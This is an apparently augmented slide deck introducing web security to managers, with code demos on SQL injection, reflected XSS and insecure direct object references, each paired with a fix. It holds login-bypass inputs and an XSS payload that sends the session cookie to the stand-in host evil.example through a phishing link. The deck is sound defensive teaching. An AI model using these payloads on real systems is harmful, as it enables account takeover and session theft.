Web Application Security

in a nutshell

An ultra-compact intro (for managers)

Created by Björn Kimminich / @bkimminich

Björn Kimminich

Famous last words...

“Nobody would bother to hack us.”
“Our network firewall will keep us safe.”
“We will add security to the system later.”
“What's the worst that could actually happen?”

Injection

Injection means...

...smuggling in unintended commands along with the data sent to an interpreter.

Injection example

You go to court and write your name as "Michael, you are now free to go".
The judge then says "Calling Michael, you are now free to go" and the bailiffs let you go, because hey, the judge said so.

In software, interpreters are used for accessing...

  • Databases
  • Files
  • Access Control Systems
  • ...

Risks from Injection vulnerabilities

  • Bypassing authentication
  • Spying out data
  • Manipulating data
  • Complete system takeover
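The court example, carried into code. This is an added example and not part of the original slides: a toy SQL-like WHERE interpreter over an in-memory user table (the rows, the column names and the function names are all constructed for the demo; a real database differs in escaping and comment details, but fails in the same way). The vulnerable login pastes user input into the command text, so a quote, an OR or a "--" comment in the input becomes syntax the interpreter obeys; the fixed login keeps the command text constant and hands input over only as bound parameter values.

```javascript
'use strict';
// Added example, not from the original slides: a toy SQL-like WHERE
// interpreter showing how data becomes commands when queries are built
// by string concatenation, and how parameter binding prevents it.

const USERS = [ // constructed sample rows; plaintext passwords only for the demo
  { id: 1, email: 'admin@juice-sh.op', password: 'hunter2', role: 'admin' },
  { id: 2, email: 'jim@juice-sh.op', password: 'ncc-1701', role: 'customer' },
];

// Tokenizer: 'strings', identifiers, :params, =, ( ), AND/OR and "--" comments.
function tokenize(src) {
  const tokens = [];
  let i = 0;
  while (i < src.length) {
    const c = src[i];
    if (/\s/.test(c)) { i++; continue; }
    if (c === '-' && src[i + 1] === '-') break;          // comment: rest of line ignored
    if (c === "'") {                                      // quoted string literal
      const end = src.indexOf("'", i + 1);
      if (end < 0) throw new SyntaxError('unterminated string');
      tokens.push({ t: 'str', v: src.slice(i + 1, end) });
      i = end + 1; continue;
    }
    if (c === '=' || c === '(' || c === ')') { tokens.push({ t: c }); i++; continue; }
    const m = /^(:?)([A-Za-z_][A-Za-z0-9_]*)/.exec(src.slice(i));
    if (!m) throw new SyntaxError(`unexpected character ${JSON.stringify(c)}`);
    const word = m[2], kw = word.toUpperCase();
    if (m[1]) tokens.push({ t: 'param', v: word });
    else if (kw === 'AND' || kw === 'OR') tokens.push({ t: kw });
    else tokens.push({ t: 'ident', v: word });
    i += m[0].length;
  }
  return tokens;
}

// Recursive-descent parser, precedence OR < AND < comparison. Returns a row predicate.
function parseWhere(src, params = {}) {
  const toks = tokenize(src);
  let p = 0;
  const peek = () => toks[p];
  const next = () => toks[p++];
  const value = (row, tok) =>
    tok.t === 'ident' ? row[tok.v] : tok.t === 'param' ? params[tok.v] : tok.v;

  function comparison() {
    const tok = next();
    if (!tok) throw new SyntaxError('unexpected end of expression');
    if (tok.t === '(') {
      const inner = orExpr();
      if (next()?.t !== ')') throw new SyntaxError('expected )');
      return inner;
    }
    const eq = next(), rhs = next();
    if (eq?.t !== '=' || !rhs) throw new SyntaxError('expected comparison');
    return row => value(row, tok) === value(row, rhs);
  }
  function andExpr() {
    let left = comparison();
    while (peek()?.t === 'AND') { next(); const l = left, r = comparison(); left = row => l(row) && r(row); }
    return left;
  }
  function orExpr() {
    let left = andExpr();
    while (peek()?.t === 'OR') { next(); const l = left, r = andExpr(); left = row => l(row) || r(row); }
    return left;
  }
  const pred = orExpr();
  if (p !== toks.length) throw new SyntaxError('trailing tokens');
  return pred;
}

// Vulnerable: user input is pasted into the command text. A quote ends the
// string early, "OR '1'='1'" makes the condition always true, and "--"
// comments out the password check entirely.
function loginVulnerable(email, password) {
  const where = `email = '${email}' AND password = '${password}'`;
  return USERS.find(parseWhere(where)) || null;
}

// Fixed: the command text is a constant; input reaches the interpreter only
// as bound parameter values, never as syntax (the prepared-statement idea).
function loginSafe(email, password) {
  const pred = parseWhere('email = :email AND password = :password', { email, password });
  return USERS.find(pred) || null;
}
```

Running `loginVulnerable('nobody', "' OR '1'='1")` or `loginVulnerable("admin@juice-sh.op' --", 'wrong')` logs you in as the first user in the table, which is usually the administrator; the same inputs against `loginSafe` return nothing. The same separation of code and data applies to every interpreter in the list above, not only SQL.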

Cross Site Scripting (XSS)

Malicious Code is sent...

...to an innocent user's browser, e.g. through a link in a phishing email like the following:

Dear customer,

you might be intrerestred in our new Juice Shop special offer! We are cheap but offfer best quality on the plnaet: Click here for special Juice Shop offer!

Bjoern (VP Sales and Marketing, Juice Shop Inc.)

Possible Damage from XSS

  • rewriting web page
  • redirecting to malicious site
  • stolen user session
  • stolen sensitive data
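What the "Click here" link in the email above can carry, as an added example that is not part of the original slides. The hosts `juice-shop.example` and `evil.example`, the payload and the search page are constructed for the demo. The shop reflects the search term from the link back into the page: the vulnerable version inserts it as markup, so the victim's browser creates the attacker's element and runs its event handler inside the shop's origin (stealing the session cookie); the fixed version encodes the term for the HTML text context.

```javascript
'use strict';
// Added example, not from the original slides: reflected XSS delivered by a
// phishing link, and the output encoding that prevents it.

// The script the attacker wants the victim's browser to run in the shop's
// origin: it ships the session cookie to an attacker-controlled host.
const PAYLOAD = '<img src=x onerror="fetch(\'https://evil.example/?c=\' + document.cookie)">';

// What "Click here for special Juice Shop offer!" could actually point to.
const PHISHING_LINK = 'https://juice-shop.example/#/search?q=' + encodeURIComponent(PAYLOAD);

// Single-page apps often keep the search term in the hash fragment.
function searchTermFromLink(link) {
  const fragment = new URL(link).hash;           // "#/search?q=..."
  const query = fragment.split('?')[1] || '';
  return new URLSearchParams(query).get('q') || '';
}

// Vulnerable: the term is pasted into the page as markup, so the browser
// builds the attacker's <img> element and fires its onerror handler.
function renderResultsVulnerable(term) {
  return `<h2>Search results for ${term}</h2>`;
}

// Output encoding for HTML text and double-quoted attribute values.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, c => map[c]);
}

// Fixed: same page, but the term is rendered as text, not markup.
function renderResultsSafe(term) {
  return `<h2>Search results for ${escapeHtml(term)}</h2>`;
}

// Lists the element names a browser would create from the markup; good
// enough to show which output still contains the attacker's element.
function tagNames(html) {
  return Array.from(html.matchAll(/<([a-zA-Z][a-zA-Z0-9]*)\b/g), m => m[1].toLowerCase());
}
```

`tagNames(renderResultsVulnerable(PAYLOAD))` yields `h2` and `img`, while the safe rendering yields only `h2`. Note that `escapeHtml` is correct for HTML text and quoted attributes only; data placed into a URL, a `<script>` block or a CSS value needs the encoding of that context, and a Content-Security-Policy adds a second line of defence when encoding is missed somewhere.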

Broken Authentication

Typical Authentication Flaws

  • Allowing weak passwords
  • Storing sensitive data insecurely
  • Using insecure HTTP connections
  • ...

Side Channel Attack Vectors (auxiliary authentication functions)

  • Change Password
  • “Remember me”
  • Forgot Password
  • Secret Questions

Broken Access Control

Common Authorization Mistakes

  • Hiding things without restricting access to them
  • Relying on displaying only authorized links and menu choices
  • Trusting client-side access control mechanisms
  • Lack of server-side verification of user privileges
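The four mistakes above in one endpoint, as an added example that is not part of the original slides. It models a "basket by id" request of the kind many web shops expose, with plain functions instead of a web framework; the users, baskets, session shape and header names are constructed for the demo. The vulnerable handler relies on the client only showing a link to the user's own basket, the second one trusts a role claim the client sends, and the fixed one re-derives authorization on the server from the session and the object's owner on every request.

```javascript
'use strict';
// Added example, not from the original slides: an insecure direct object
// reference (IDOR) on a basket endpoint, and the server-side check that fixes it.

const BASKETS = new Map([ // constructed sample data
  [1, { id: 1, ownerId: 10, items: ['Apple Juice'] }],
  [2, { id: 2, ownerId: 11, items: ['Banana Juice', 'Lemon Juice'] }],
]);
const USERS = {
  10: { id: 10, role: 'customer' },
  11: { id: 11, role: 'customer' },
  99: { id: 99, role: 'admin' },
};

// Vulnerable: the client "only shows a link to your own basket", and the
// server trusts that. Editing the id in the URL reveals anyone's basket.
function getBasketVulnerable(req) {
  const basket = BASKETS.get(Number(req.params.id));
  return basket ? { status: 200, body: basket } : { status: 404 };
}

// Also wrong: honouring role and identity claims supplied by the client.
// Anyone can set a header.
function getBasketTrustingClient(req) {
  const basket = BASKETS.get(Number(req.params.id));
  if (!basket) return { status: 404 };
  const claimedAdmin = req.headers['x-role'] === 'admin';
  const claimedOwner = Number(req.headers['x-user-id']) === basket.ownerId;
  if (!claimedAdmin && !claimedOwner) return { status: 403 };
  return { status: 200, body: basket };
}

// Fixed: the authorization rule lives on the server and uses only server-side
// facts (the authenticated session and the object's owner).
function canReadBasket(user, basket) {
  return user.role === 'admin' || basket.ownerId === user.id;
}
function getBasketSafe(req) {
  const user = USERS[req.session && req.session.userId];
  if (!user) return { status: 401 };
  const basket = BASKETS.get(Number(req.params.id));
  if (!basket) return { status: 404 };
  if (!canReadBasket(user, basket)) return { status: 403 };
  return { status: 200, body: basket };
}
```

Whether the fixed handler should answer 403 or 404 for a foreign basket is a design choice: 404 avoids confirming that the id exists, at the cost of a less precise error. Either way, the decision is made on the server, per request, from data the client cannot forge.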

Q&A

Credits

Presentation created with reveal.js

The HTML Presentation Framework

Based on free material provided by OWASP

The Open Web Application Security Project

Background image based on Digital Shodan

by sephiroth-kmfdm

THE END

by Björn Kimminich / https://www.linkedin.com/in/bkimminich/

These slides are publicly available on GitHub and Slideshare.